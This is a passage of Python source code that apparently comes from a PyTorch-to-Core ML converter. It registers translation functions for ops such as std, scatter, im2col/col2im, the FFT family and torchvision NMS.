= _np.sqrt(N / float(N - 1))\n\n x_mean = mb.reduce_mean(x=x, axes=axes, keep_dims=True)\n x_demeaned = mb.sub(x=x, y=x_mean)\n x_demeaned_square = mb.square(x=x_demeaned)\n x_demeaned_square_mean = mb.reduce_mean(x=x_demeaned_square, axes=axes, keep_dims=keep_dim)\n if eps > 0:\n x_demeaned_square_mean = mb.add(x=x_demeaned_square_mean, y=eps)\n if need_rescale:\n y_before_scale = mb.sqrt(x=x_demeaned_square_mean)\n y = mb.mul(x=y_before_scale, y=rescale_factor)\n else:\n y = mb.sqrt(x=x_demeaned_square_mean)\n return y\n\n@register_torch_op\ndef numel(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n x = mb.shape(x=x)\n x = mb.reduce_prod(x=x, axes=[0], name=node.name)\n context.add(x)\n\n@register_torch_op\ndef std(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n if not (len(inputs) == 2 or len(inputs) == 4):\n raise ValueError(\"Number of inputs to the 'std' op must be\"\n \"2 or 4\")\n\n keep_dim = False\n axes = None\n if len(inputs) == 2:\n unbiased = inputs[1].val\n if len(inputs) == 4:\n axes = inputs[1].val\n if isinstance(axes, int):\n axes = [axes]\n unbiased = inputs[2].val\n keep_dim = inputs[3].val\n\n y = _std(x, axes, keep_dim, unbiased, 0)\n context.add(y, node.name)\n\n\n@register_torch_op\ndef copy(context, node):\n inputs = _get_inputs(context, node, expected=[2, 3])\n context.add(mb.identity(x=inputs[0], name=node.name))\n\n\n@register_torch_op\ndef dtype(context, node):\n inputs = _get_inputs(context, node, expected=1)\n dtype_str = inputs[0].dtype.__name__\n context.add(mb.const(val=dtype_str, name=node.name))\n\n\n@register_torch_op\ndef tensor(context, node):\n def _make_tensor(list_of_tensor, name, rank):\n if rank == 6:\n raise NotImplementedError(\"Core ML only supports tensor rank <= 5.\")\n if not isinstance(list_of_tensor, list):\n return list_of_tensor\n values = [\n _make_tensor(x, name + \"_r_\" + str(i), rank + 1)\n for i, x in enumerate(list_of_tensor)\n ]\n if len(values) == 1:\n return mb.expand_dims(x=values[0], axes=[0], name=name)\n return mb.stack(values=values, axis=0, name=name)\n\n inputs = _get_inputs(context, node, expected=4)\n\n # Case 1: Using torch.tensor to create a const tensor\n # For example:\n # torch.tensor([[[0, 0], [0, 10], [5, 10], [5, 0]]], dtype=torch.float32)\n val = inputs[0]\n if isinstance(val, list):\n context.add(_make_tensor(val, node.name, 1))\n return\n\n if inputs[2] is None:\n context.add(mb.identity(x=val, name=node.name))\n return\n\n # Case 2: Create a tensor filled with a single value\n val = val.val # element val to fill\n msg_prefix = 'torch::tensor {} '.format(node.name)\n if val is None:\n raise ValueError(msg_prefix + 'val is None')\n dtype_str = inputs[1].val\n if dtype_str != \"fp32\":\n raise NotImplementedError(\n msg_prefix + \"Unsupported dtype: {}\".format(dtype_str)\n )\n # inputs[3] is a bool (not sure what it is)\n shape = mb.shape(x=inputs[2], name=node.name + \"_shape\")\n context.add(mb.fill(shape=shape, value=val, name=node.name))\n\n\n\"\"\"\nPack and unpack op in pytorch.\nThe typical pattern is as following\n\n>>> seq = torch.tensor([[1,2,0], [3,0,0], [4,5,6]])\n>>> lens = [2, 1, 3]\n>>> packed = pack_padded_sequence(seq, lens, batch_first=True, enforce_sorted=False)\n>>> packed\nPackedSequence(data=tensor([4, 1, 3, 5, 2, 6]), batch_sizes=tensor([3, 2, 1]),\n sorted_indices=tensor([2, 0, 1]), unsorted_indices=tensor([1, 2, 0]))\n>>> seq_unpacked, lens_unpacked = pad_packed_sequence(packed, batch_first=True)\n>>> seq_unpacked\ntensor([[1, 2, 0],\n [3, 0, 0],\n [4, 5, 6]])\n>>> lens_unpacked\ntensor([2, 1, 3])\n\nsource from https://pytorch.org/docs/stable/generated/torch.nn.utils.rnn.pad_packed_sequence.html\n\"\"\"\n\n\n@register_torch_op\ndef _pack_padded_sequence(context, node):\n # The implementation of this op is not efficient. Raise a warning.\n logger.warning(\n \"Encountered a _pack_padded_sequence layer. The implementation of translating pack/unpack op\\\n in pytorch is not efficient due to the current limitation of Core ML. Removing the pack-unpack logic \\\n and use a fixed batch size model is recommended.\"\n )\n\n inputs = _get_inputs(context, node, expected=3)\n tensor_name, batch_sizes_name = node.outputs\n tensor_input = inputs[0]\n batch_sizes = inputs[1]\n batch_first = inputs[2].val\n\n # by assuming that the output of this op is always feed in lstm layer,\n # we enforce the layout to be Batch * seq_length * Feature.\n if not batch_first:\n tensor_input = mb.transpose(x=tensor_input, perm=[1, 0, 2])\n context.add(mb.identity(x=tensor_input, name=tensor_name))\n\n # add the batch_sizes in the context, so that _pad_packed_sequence can\n # find it later.\n context.add(mb.identity(x=batch_sizes, name=batch_sizes_name))\n\n\n@register_torch_op\ndef _pad_packed_sequence(context, node):\n # The implementation of this op is not efficient. Raise a warning.\n logger.warning(\n \"Encountered a _pad_packed_sequence layer. The implementation of translating pack/unpack op\\\n in pytorch is not efficient due to the current limitation of Core ML. Removing the pack-unpack logic \\\n and use a fixed batch size model is recommended.\"\n )\n inputs = _get_inputs(context, node)\n\n # seq_lengths denotes the actual sequence length for each batch.\n # pad denotes the padding value for those data which has shorter length.\n input_tensor = inputs[0]\n seq_lengths = inputs[1]\n batch_first = inputs[2].val\n pad = inputs[3].val\n\n # we only support pack and unpack translation for static tensor shape,\n # i.e., the three dimensions are all known during compile time.\n if any([is_symbolic(x) for x in input_tensor.shape]):\n raise NotImplementedError(\"Only static shape of PackedSequence object is supported.\")\n\n # the input always has batch first layout.\n # padded_seq_len denotes the maximum sequence length across batches.\n batch, padded_seq_len, input_dim = input_tensor.shape\n assert seq_lengths.rank == 1\n assert batch == seq_lengths.shape[0]\n\n # we iterate through the batch, pad each data, and concate them into a single tensor in the end,\n # which is the total_tensor here.\n # Say the input_tensor has shape [batch , padded_seq_len, input_dim],\n # and the seq_lengths = [len_1, len_2, len_3].\n # Note that in pytorch, the seq_lengths must be decreasing in order, len_1 >= len_2 >= len_3.\n total_tensor = []\n\n for i in range(batch):\n # slice for each data\n # x has shape [padded_seq_len, input_dim]\n x = mb.slice_by_index(\n x=input_tensor,\n begin=[i, 0, 0],\n end=[0, 0, 0],\n stride=[1, 1, 1],\n begin_mask=[False, True, True],\n end_mask=[False, True, True],\n squeeze_mask=[True, False, False],\n )\n\n # get the unpadded sequence,\n # if the unpadded sequence has length seq_length,\n # x would have shape [seq_length, input_dim].\n # For example, the first data would result in a [len_1, input_dim] tensor.\n seq_length = mb.cast(x=value_at(seq_lengths, i), dtype=\"int32\")\n concate_values = [seq_length, input_dim]\n end_index = mb.concat(values=concate_values, axis=0)\n x = mb.slice_by_index(\n x=x,\n begin=[0, 0],\n end=end_index,\n stride=[1, 1],\n begin_mask=[True, True],\n end_mask=[False, True],\n )\n\n # get the padding part of the data\n # Note that we always add one dummy padding in the end with shape [padded_seq_len - seq_length + 1, input_dim].\n # The reason is that for the case when seq_length = padded_seq_len,\n # coreml cannot handle the empty tensor.\n pad_length = mb.sub(x=padded_seq_len + 1, y=seq_length)\n concate_values = [pad_length, input_dim]\n shape = mb.concat(values=concate_values, axis=0)\n pad_values = mb.fill(shape=shape, value=pad)\n\n # concate the unpadded sequence and the padding data\n # the resulting tensor would have shape [padded_seq_len + 1, input_dim]\n x, pad_values = promote_input_dtypes([x, pad_values])\n concate_values = [x, pad_values]\n add_values = mb.concat(values=concate_values, axis=0)\n\n # trim the dummy padding tensor\n # the output would have shape [padded_seq_len, input_dim]\n x = mb.slice_by_index(\n x=add_values,\n begin=[0, 0],\n end=[padded_seq_len, 0],\n stride=[1, 1],\n begin_mask=[True, True],\n end_mask=[False, True],\n )\n\n # add it to total tensor\n total_tensor.append(x)\n\n # transpose the tensor if batch_first = False\n if not batch_first:\n x = mb.stack(values=total_tensor, axis=0)\n x = mb.transpose(x=x, perm=[1, 0, 2], name=node.name)\n else:\n x = mb.stack(values=total_tensor, axis=0, name=node.name)\n\n context.add(x)\n\n\n@register_torch_op\ndef log10(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n log_x = mb.log(x=x)\n context.add(mb.mul(x=log_x, y=1 / _np.log(10.0)), node.name)\n\n\n@register_torch_op\ndef log2(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n log_x = mb.log(x=x)\n context.add(mb.mul(x=log_x, y=1 / _np.log(2.0)), node.name)\n\n\n@register_torch_op\ndef flip(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = mb.reverse(x=inputs[0], axes=inputs[1], name=node.name)\n context.add(x, node.name)\n\n\n@register_torch_op(torch_alias=[\"reflection_pad1d\"])\ndef reflection_pad2d(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n torch_pad = inputs[1].val\n pad_flipped = torch_pad.reshape((-1, 2))[::-1].ravel()\n pad = _np.pad(pad_flipped, (len(x.shape) * 2 - len(pad_flipped), 0))\n context.add(mb.pad(x=x, pad=pad, mode='reflect'), node.name)\n\n\n@register_torch_op(torch_alias=[\"replication_pad1d\"])\ndef replication_pad2d(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n torch_pad = inputs[1].val\n pad_flipped = torch_pad.reshape((-1, 2))[::-1].ravel()\n pad = _np.pad(pad_flipped, (len(x.shape) * 2 - len(pad_flipped), 0))\n context.add(mb.pad(x=x, pad=pad, mode='replicate'), node.name)\n\n\ndef _broadcast_tensors(tensors):\n def _solve_broadcast_shape(shapes):\n rank = _np.max([len(shape) for shape in shapes])\n shapes = [[1] * (rank - len(shape)) + shape for shape in shapes]\n result_shape = []\n for i in range(rank):\n dims = [shapes[j][i] for j in range(len(tensors))]\n if any_symbolic(dims):\n # rdar://85559497 (Handle dynamic shapes inputs broadcast for pytorch)\n raise NotImplementedError(\n \"Only static shaped inputs are supported for torch.broadcast_tensors conversion.\"\n )\n result_shape.append(_np.max(dims))\n return result_shape\n\n if len(tensors) == 1:\n return tensors\n\n # solve the broadcast shape\n input_shapes = [list(x.shape) for x in tensors]\n broadcast_shape = _solve_broadcast_shape(input_shapes)\n\n # do the broadcasting\n results = []\n for tensor in tensors:\n name = tensor.name + \"_after_broadcast\"\n results.append(_broadcast(name, tensor, broadcast_shape))\n return results\n\n\n@register_torch_op\ndef broadcast_tensors(context, node):\n inputs = _get_inputs(context, node)\n context.add(_broadcast_tensors(inputs[0]), node.name)\n\n\ndef _scatter(context, inputs, mode, name):\n data = inputs[0]\n axis = inputs[1].val\n indices = inputs[2]\n updates = inputs[3]\n if types.is_scalar(updates.sym_type):\n updates = mb.fill(shape=indices.shape, value=updates.val, name=name)\n result = mb.scatter_along_axis(data=data, indices=indices, updates=updates,\n axis=axis, mode=mode, name=name)\n context.add(result)\n\n\n@register_torch_op\ndef scatter(context, node):\n inputs = _get_inputs(context, node)\n assert len(inputs) in (4, 5)\n\n # Determine reduce/mode parameter\n if len(inputs) == 5:\n mode = inputs[4].val\n if mode == 'multiply':\n mode = 'mul'\n else:\n assert mode == 'add'\n else:\n mode = 'update'\n\n _scatter(context, inputs, mode, node.name)\n\n\n@register_torch_op\ndef scatter_add(context, node):\n inputs = _get_inputs(context, node)\n _scatter(context, inputs, 'add', node.name)\n\n\n@register_torch_op\ndef baddbmm(context, node):\n \"\"\"\n baddbmm(Tensor input, Tensor batch1, Tensor batch2, Scalar beta=1, Scalar alpha=1)\n output = beta * input + alpha * batch1 * batch2\n\n Notice that batch1 and batch2 must be 3-D tensors each containing the same number of matrices.\n If batch1 is a (b×n×m) tensor, batch2 is a (b×m×p) tensor, then input must be broadcastable with a (b×n×p) tensor\n and out will be a (b×n×p) tensor.\n \"\"\"\n assert len(node.outputs) == 1\n inputs = _get_inputs(context, node, expected=5)\n bias, batch1, batch2, beta, alpha = inputs\n\n if alpha.val != 1.0:\n # Apply scaling factor alpha to the input.\n batch1 = mb.mul(x=alpha, y=batch1, name=batch1.name + \"_scaled\")\n context.add(batch1)\n\n bmm_node = mb.matmul(x=batch1, y=batch2, name=node.name + \"_bmm\")\n\n if beta.val != 0.0 or bias.shape != bmm_node.shape:\n context.add(bmm_node)\n if beta.val != 1.0:\n # Torch supports integers, so convert to float before\n if beta.dtype != bias.dtype:\n logger.warning(\n f\"Casting the `beta`(value={beta.val}) argument of `baddbmm` op {node.name} \"\n f\"from {beta.dtype} to {bias.dtype} dtype\")\n beta = mb.cast(x=beta, dtype=TYPE_TO_DTYPE_STRING[bias.dtype])\n # Apply scaling factor beta to the bias.\n bias = mb.mul(x=beta, y=bias, name=bias.name + \"_scaled\")\n context.add(bias)\n\n baddbmm_node = mb.add(x=bias, y=bmm_node, name=node.name)\n context.add(baddbmm_node)\n else:\n bmm_node.name = node.name\n context.add(bmm_node)\n\n\n\n@register_torch_op\ndef glu(context, node):\n \"\"\"\n glu(Tensor input, Scalar dim=-1)\n Applies the gated linear unit function GLU(a,b)=a⊗σ(b) where a is the first half of the input matrices and b is the\n second half.\n \"\"\"\n assert len(node.outputs) == 1\n inputs = _get_inputs(context, node, expected=2)\n input, axis = inputs\n\n first_half, second_half = mb.split(x=input, num_splits=2, axis=axis.val, name=node.name + \"_split\")\n context.add(first_half)\n context.add(second_half)\n\n sigmoid_second_half = mb.sigmoid(x=second_half, name=second_half.name + \"_sigmoid\")\n context.add(sigmoid_second_half)\n\n glu_node = mb.mul(x=first_half, y=sigmoid_second_half, name=node.name)\n context.add(glu_node)\n\n\n@register_torch_op\ndef hstack(context, node):\n \"\"\"\n hstack(List[Tensor] tensors, Optional[Tensor] out)\n Stack tensors in sequence horizontally (column wise). This is equivalent to concatenation along the first axis for\n 1-D tensors, and along the second axis for all other tensors.\n \"\"\"\n inputs = _get_inputs(context, node)\n tensors = inputs[0]\n input_shapes = [list(x.shape) for x in tensors]\n # Concatenates along the first axis for 1-D tensors, and along the second axis for all other tensors.\n axis = 0 if len(input_shapes[0]) == 1 else 1\n hstack_node = mb.concat(values=tensors, axis=axis, name=node.name)\n context.add(hstack_node)\n\n\n@register_torch_op\ndef remainder(context, node):\n \"\"\"\n remainder(Tensor dividend, Tensor divisor, Optional[Tensor] out)\n Computes Python’s modulus operation entrywise. The result has the same sign as the divisor and its absolute value\n is less than that of divisor. It may also be defined in terms of torch.div() as:\n remainder(a, b) == a - a.div(b, rounding_mode=\"floor\") * b\n \"\"\"\n # Don't specify `expected` because the parameter `out` is optional.\n inputs = _get_inputs(context, node)\n dividend, divisor = promote_input_dtypes([inputs[0], inputs[1]])\n div_node = mb.floor_div(x=dividend, y=divisor, name=node.name + \"_div\")\n context.add(div_node)\n scaled_div = mb.mul(x=div_node, y=divisor, name=div_node.name + \"_scaled\")\n context.add(scaled_div)\n remainder_node = mb.sub(x=dividend, y=scaled_div, name=node.name)\n context.add(remainder_node)\n\n\n@register_torch_op\ndef hann_window(context, node):\n inputs = _get_inputs(context, node, expected=[5, 6])\n if inputs[0].val is None:\n raise NotImplementedError(\"variable 'window_length' not supported.\")\n\n periodic = True\n if len(inputs) == 6:\n if inputs[1].val is None:\n raise NotImplementedError(\"variable 'periodic' not supported.\")\n if not inputs[1].val:\n periodic = False\n\n size = (inputs[0].val,)\n if inputs[0].val <= 1:\n one = mb.fill(shape=size, value=1.0, name=node.name)\n context.add(one)\n return\n\n ones = mb.fill(shape=size, value=1.0)\n cum = mb.cumsum(x=ones, axis=0)\n seq = mb.sub(x=cum, y=ones)\n pi = mb.fill(shape=size, value=_math.pi)\n window_length_float = mb.cast(x=inputs[0], dtype=\"fp32\")\n if not periodic:\n window_length_float = mb.sub(x=window_length_float, y=ones)\n denominator = mb.fill(shape=size, value=window_length_float)\n numerator = mb.mul(x=seq, y=pi)\n frac = mb.real_div(x=numerator, y=denominator)\n sin = mb.sin(x=frac)\n sin_sq = mb.mul(x=sin, y=sin, name=node.name)\n context.add(sin_sq)\n\n@register_torch_op\ndef mse_loss(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n y = inputs[1]\n reduction = inputs[2].val\n\n diff = mb.sub(x=x, y=y)\n\n if reduction == 0:\n # reduction is \"none\"\n res = mb.mul(x=diff, y=diff, name=node.name)\n context.add(res)\n return\n\n square = mb.mul(x=diff, y=diff)\n if reduction == 1:\n # reduction is \"mean\"\n res = mb.reduce_mean(x=square, axes=None, name=node.name)\n\n elif reduction == 2:\n # reduction is \"sum\"\n res = mb.reduce_sum(x=square, axes=None, name=node.name)\n else:\n raise ValueError(\"Reduction is not supported\")\n\n context.add(res)\n\n@register_torch_op\ndef trace(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n dims = mb.shape(x=x)\n dim0 = value_at(dims, 0)\n dim1 = value_at(dims, 1)\n min_dim = mb.minimum(x=dim0, y=dim1)\n indices = mb.range_1d(end=min_dim, start=0, step=1)\n indices = mb.stack(values=[indices, indices], axis=1)\n diagonal = mb.gather_nd(x=x, indices=indices)\n trace = mb.reduce_sum(x=diagonal, name=node.name)\n context.add(trace)\n\n@register_torch_op\ndef roll(context, node):\n inputs = _get_inputs(context, node, expected=3)\n x = inputs[0]\n shift = inputs[1].val\n dims = inputs[2].val\n origin_shape = mb.shape(x=x)\n\n need_flatten = len(dims) == 0\n\n if need_flatten:\n # The tensor is flattened before rolling\n x = mb.reshape(x=x, shape=[-1])\n dims = [0]\n\n shape = mb.shape(x=x)\n\n for s, i in zip(shift, dims):\n dim = value_at(shape, i)\n s = mb.mod(x=s, y=dim)\n start_idx = mb.sub(x=dim, y=s)\n indices0 = mb.range_1d(end=dim, start=start_idx, step=1)\n indices1 = mb.range_1d(end=start_idx, start=0, step=1)\n indices = mb.concat(values=[indices0, indices1], axis=0)\n x = mb.gather(x=x, indices=indices, axis=i)\n\n if need_flatten:\n x = mb.reshape(x=x, shape=origin_shape)\n\n context.add(x, node.name)\n\n\ndef _construct_unfold_indices(N, C, H, W, kernel_size, stride):\n \"\"\"\n A utility function to construct indices for torch.unfold (im2col),\n assuming the torch.unfold input `x` to be contiguous\n \"\"\"\n\n # Get starting block indices.\n start_idx = _np.arange(kernel_size[0])[None, :, None] * W + _np.arange(\n kernel_size[1]\n )\n\n # Generate depth indices.\n channel_index = H * W * _np.arange(C)\n start_idx = (channel_index[None, :, None] + _np.ravel(start_idx)).reshape(\n (-1, kernel_size[0], kernel_size[1])\n )\n\n # Get offsetted indices across the height and width of input array.\n row_extent = H - kernel_size[0] + 1\n col_extent = W - kernel_size[1] + 1\n offset_idx = _np.arange(0, row_extent, stride[0])[None, :, None] * W + _np.arange(0, col_extent, stride[1])\n indices = _np.ravel(start_idx)[:, None] + _np.ravel(offset_idx)\n\n # Get batch block indices.\n batch_idx = _np.arange(N)[:, None, None] * C * H * W\n indices = batch_idx + indices\n\n return indices.reshape(-1)\n\n\n@register_torch_op\ndef im2col(context, node):\n \"\"\"\n Extract sliding local blocks from a batched input tensor (rank=4).\n\n torch.nn.functional.unfold aims to be the general version: im2col is the rank=4 case of unfold.\n PyTorch currently only supports rank=4 input: torch.nn.functional.unfold redispatches to at::im2col,\n which is why coremltools needs im2col to convert torch.nn.functional.unfold.\n\n We currently only support rank=4 input (consistent with PyTorch) and dilation set to 1.\n More flexbible dilation support will be added in the future.\n\n Reference https://pytorch.org/docs/stable/generated/torch.nn.Unfold.html\n \"\"\"\n inputs = _get_inputs(context, node, expected=5)\n x = inputs[0]\n kernel_size = inputs[1].val\n dilation = inputs[2].val\n padding = inputs[3].val\n stride = inputs[4].val\n\n if x.rank != 4:\n raise ValueError(\"Only supports rank=4 input data for im2col (unfold).\")\n if not (dilation[0] == 1 and dilation[1] == 1):\n raise ValueError(\"Only supports dilation=1 for im2col (unfold).\")\n\n # for simplicity, we explicitly pad; TODO: implicit padding would be more efficient\n # torch.unfold padding has different semantics\n # * for torch.unfold\n # x.shape[i + x.rank - padding.rank] = padding[i] + x.shape[i + x.rank - padding.rank] + padding[i]\n # taking x.rank = 4 and padding.rank = 2 as an example:\n # x.shape[0 + 4 - 2] = padding[0] + x.shape[0 + 4 - 2] + padding[0]\n # x.shape[1 + 4 - 2] = padding[1] + x.shape[1 + 4 - 2] + padding[1]\n # * for mb.pad(x=x, pad=pad, mode=\"constant\")\n # x.shape[i] = pad[2 * i] + x.shape[i] + pad[2 * i + 1]\n # * for torch.nn.functional.pad\n # x.shape[-1] = padding[0] +x.shape[-1] + padding[1]\n # x.shape[-2] = padding[2] +x.shape[-1] + padding[3]\n # ...\n # x.shape[-i] = padding[2 * i - 2] + x.shape[-i] + padding[2 * i - 1]\n # so we need to convert torch.unfold padding to mb.pad(mode=\"constant\") pad\n missing_dims = x.rank - len(padding)\n pad = [0, 0] * missing_dims + _np.array(padding).repeat(2).tolist()\n x = mb.pad(x=x, pad=pad, mode=\"constant\")\n\n N, C, H, W = x.shape\n\n # Get total number of blocks. It follows the formula at torch.nn.Unfold documentation.\n sptial_size = (H, W)\n block_count = 1\n for i in range(2):\n block_count *= _np.floor(\n # the original formula is\n # (sptial_size[i] + 2 * padding[i] - dilation[i] * (kernel_size[i] - 1) - 1) / stride[i]\n # since we have explicitly padded, we no longer add 2 * padding[i] to sptial_size[i]\n (sptial_size[i] - dilation[i] * (kernel_size[i] - 1) - 1) / stride[i]\n + 1\n ).astype(_np.int32)\n\n \"\"\"\n The implementation below assumes x to be contiguous\n \"\"\"\n\n indices = _construct_unfold_indices(N, C, H, W, kernel_size, stride)\n\n x = mb.reshape(x=x, shape=[-1])\n gathered_data = mb.gather_along_axis(x=x, indices=indices, axis=0)\n block_size = C * kernel_size[0] * kernel_size[1]\n output = mb.reshape(\n x=gathered_data, shape=(N, block_size, block_count), name=node.name\n )\n\n context.add(output)\n\n\n@register_torch_op\ndef col2im(context, node):\n \"\"\"\n Combines an array of sliding local blocks into a large containing tensor.\n\n torch.nn.functional.fold aims to be the general version:\n col2im is the \"2 output spatial dimensions\" case of fold.\n\n PyTorch currently only supports col2im: torch.nn.functional.fold redispatches to at::col2im,\n which is why coremltools needs col2im to convert torch.nn.functional.fold.\n\n We currently only support col2im (consistent with PyTorch) and:\n * dilation set to 1\n * padding set to 0\n * stride set to kernel_size\n * output_size is divisible by kernel_size\n\n More flexbible support will be added in the future.\n\n Reference https://pytorch.org/docs/stable/generated/torch.nn.Fold.html\n \"\"\"\n\n inputs = _get_inputs(context, node, expected=6)\n x = inputs[0]\n output_size = inputs[1].val\n kernel_size = inputs[2].val\n dilation = inputs[3].val\n padding = inputs[4].val\n stride = inputs[5].val\n\n if len(output_size) != 2:\n raise ValueError(\"Only supports 2 output spatial dimensions for col2im (fold).\")\n if not (dilation[0] == 1 and dilation[1] == 1):\n raise ValueError(\"Only supports dilation=1 for col2im (fold).\")\n if not (padding[0] == 0 and padding[1] == 0):\n raise ValueError(\"Only supports padding=0 for col2im (fold).\")\n # In Pytorch, if multiple entries unfold to same location, then in folding they are accumulated\n # In Core ML, however, there is no such op to perform this accumulation,\n # so we cowardly refuse to convert if accumulation happens\n # TODO: we may be able to support accumulation if x has certain symmetry (e.g. output by im2col)\n # by multiplying the repeat times of each entry\n if any(stride != kernel_size):\n raise ValueError(\"Only supports stride = kernel_size for col2im (fold).\")\n # We implement fold as an inverse to unfold\n # i.e. a gather with indices that are inverse to unfold gather indices\n # This works only if there is no edge leftover\n if any(output_size % kernel_size != 0):\n raise ValueError(\"Only supports output_size % kernel_size = 0 for col2im (fold).\")\n\n N, block_size, block_count = x.shape\n C = int(block_size / _np.prod(kernel_size))\n H, W = output_size\n\n \"\"\"\n The implementation below assumes x to be contiguous\n \"\"\"\n\n # inverse unfold indices\n indices_unfold = _construct_unfold_indices(N, C, H, W, kernel_size, stride)\n indices = _np.empty(indices_unfold.shape, dtype=np.int32)\n for i in range(indices.shape[0]):\n indices[indices_unfold[i]] = i\n\n # perform gather with fold indices\n x_flatten = mb.reshape(x=x, shape=(-1,))\n y_flatten_with_extra = mb.gather_along_axis(x=x_flatten, indices=indices)\n y_flatten = mb.slice_by_index(x=y_flatten_with_extra, begin=(0,), end=(N * C * H * W,))\n y = mb.reshape(x=y_flatten, shape=(N, C, H, W), name=node.name)\n\n context.add(y)\n\n\n@register_torch_op\ndef complex(context, node):\n real_part, imag_part = _get_inputs(context, node, expected=2)\n result = mb.complex(real_data=real_part, imag_data=imag_part)\n context.add(result, node.name)\n\n\n@register_torch_op\ndef real(context, node):\n input_data = _get_inputs(context, node, expected=1)[0]\n if types.is_complex(input_data.dtype):\n real_part = mb.complex_real(data=input_data)\n context.add(real_part, node.name)\n else:\n context.add(input_data, node.name)\n\n\n@register_torch_op\ndef imag(context, node):\n input_data = _get_inputs(context, node, expected=1)[0]\n if not types.is_complex(input_data.dtype):\n # Keep consistent with PyTorch.\n raise ValueError(\"The `imag` op only supports complex input.\")\n real_part = mb.complex_imag(data=input_data)\n context.add(real_part, node.name)\n\n\n@register_torch_op\ndef view_as_real(context, node):\n input_data = _get_inputs(context, node, expected=1)[0]\n if not types.is_complex(input_data.dtype):\n raise ValueError(f\"view_as_real only supports complex input, but got {types.builtin_to_string(input_data.dtype)}\")\n\n real_part = mb.complex_real(data=input_data)\n imag_part = mb.complex_imag(data=input_data)\n result = mb.stack(values=[real_part, imag_part], axis=-1)\n context.add(result, node.name)\n\n\n@register_torch_op\ndef fft_fft(context, node):\n \"\"\"Lowers torch.fft.fft by the dialect op `complex_fft` from complex_dialect_ops.py.\"\"\"\n input_data, n, dim, norm = _get_inputs(context, node, expected=[4])\n fft_res = mb.complex_fft(data=input_data, n=n, dim=dim, norm=norm)\n context.add(fft_res, node.name)\n\n\n@register_torch_op\ndef fft_fftn(context, node):\n \"\"\"Lowers torch.fft.fftn by the dialect op `complex_fftn` from complex_dialect_ops.py.\"\"\"\n input_data, shapes, dims, norm = _get_inputs(context, node, expected=[4])\n fft_res = mb.complex_fftn(data=input_data, shapes=shapes, dims=dims, norm=norm)\n context.add(fft_res, node.name)\n\n\n@register_torch_op\ndef fft_rfft(context, node):\n \"\"\"Lowers torch.fft.rfft by the dialect op `complex_rfft` from complex_dialect_ops.py.\"\"\"\n input_data, n, dim, norm = _get_inputs(context, node, expected=[4])\n rfft_res = mb.complex_rfft(data=input_data, n=n, dim=dim, norm=norm)\n context.add(rfft_res, node.name)\n\n\n@register_torch_op\ndef fft_rfftn(context, node):\n \"\"\"Lowers torch.fft.rfftn by the dialect op `complex_rfftn` from complex_dialect_ops.py.\"\"\"\n input_data, shapes, dims, norm = _get_inputs(context, node, expected=[4])\n rfft_res = mb.complex_rfftn(data=input_data, shapes=shapes, dims=dims, norm=norm)\n context.add(rfft_res, node.name)\n\n\n@register_torch_op\ndef fft_ifft(context, node):\n \"\"\"Lowers torch.fft.ifft by the dialect op `complex_ifft` from complex_dialect_ops.py.\"\"\"\n input_data, n, dim, norm = _get_inputs(context, node, expected=[4])\n ifft_res = mb.complex_ifft(data=input_data, n=n, dim=dim, norm=norm)\n context.add(ifft_res, node.name)\n\n\n@register_torch_op\ndef fft_ifftn(context, node):\n \"\"\"Lowers torch.fft.ifftn by the dialect op `complex_ifftn` from complex_dialect_ops.py.\"\"\"\n input_data, shapes, dims, norm = _get_inputs(context, node, expected=[4])\n ifftn_res = mb.complex_ifftn(data=input_data, shapes=shapes, dims=dims, norm=norm)\n context.add(ifftn_res, node.name)\n\n\n@register_torch_op\ndef fft_irfft(context, node):\n \"\"\"Lowers torch.fft.irfft by the dialect op `complex_irfft` from complex_dialect_ops.py.\"\"\"\n input_data, n, dim, norm = _get_inputs(context, node, expected=[4])\n irfft_res = mb.complex_irfft(data=input_data, n=n, dim=dim, norm=norm)\n context.add(irfft_res, node.name)\n\n\n@register_torch_op\ndef fft_irfftn(context, node):\n \"\"\"Lowers torch.fft.irfftn by the dialect op `complex_irfftn` from complex_dialect_ops.py.\"\"\"\n input_data, shapes, dims, norm = _get_inputs(context, node, expected=[4])\n irfftn_res = mb.complex_irfftn(data=input_data, shapes=shapes, dims=dims, norm=norm)\n context.add(irfftn_res, node.name)\n\n@register_torch_op\ndef stft(context, node):\n \"\"\"\n Lowers torch.stft with the dialect op `complex_stft` from complex_dialect_ops.py\n \"\"\"\n input_data, n_fft, hop_length, win_length, window, normalized, onesided, _ = _get_inputs(context, node, min_expected=2)\n if types.is_complex(input_data.dtype):\n onesided = False # pytorch defaults onesided to False for complex inputs\n stft_res = mb.complex_stft(\n input=input_data,\n n_fft=n_fft,\n hop_length=hop_length,\n win_length=win_length,\n window=window,\n normalized=normalized,\n onesided=onesided)\n context.add(stft_res, node.name)\n\n@register_torch_op(torch_alias=[\"torchvision::nms\"])\ndef torchvision_nms(context, node):\n inputs = _get_inputs(context, node, expected=3)\n boxes, scores = promote_input_dtypes([inputs[0], inputs[1]])\n iou_threshold = inputs[2].val\n # Use float min to avoid boxes being pruned by scores in MIL NMS op.\n score_threshold = (\n _np.finfo(_np.float16).min if boxes.dtype._width == 16 else _np.finfo(_np.float32).min\n )\n\n box_num = boxes.shape[0]\n if is_symbolic(box_num):\n # When the number of boxes is unknown at compile time, use a large number to avoid valid\n # boxes got pruned. We don't use _np.iinfo(_np.int32).max here because it triggers the MIL\n # NMS op segment fault.\n box_num = 10000\n\n # The boxes' coordinates from PyTorch input is (x1, y1, x2, y2) format with 0 <= x1 < x2 and\n # 0 <= y1 < y2. However, the MIL NMS op expects CENTER_SIZE_WIDTH_FIRST format, which is\n # (x, y, width, height) where (x, y) is the center coordinate.\n x1, y1, x2, y2 = mb.split(x=boxes, num_splits=4, axis=-1)\n # For numerical stability, use x1+(x2-x1)/2 instead of (x1+x2)/2 to calculate center coordinate.\n width = mb.sub(x=x2, y=x1)\n height = mb.sub(x=y2, y=y1)\n center_x = mb.add(x=x1, y=mb.real_div(x=width, y=2.0))\n center_y = mb.add(x=y1, y=mb.real_div(x=height, y=2.0))\n boxes = 